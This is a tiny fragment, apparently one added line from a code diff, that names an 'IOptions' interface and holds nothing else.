+ IOptions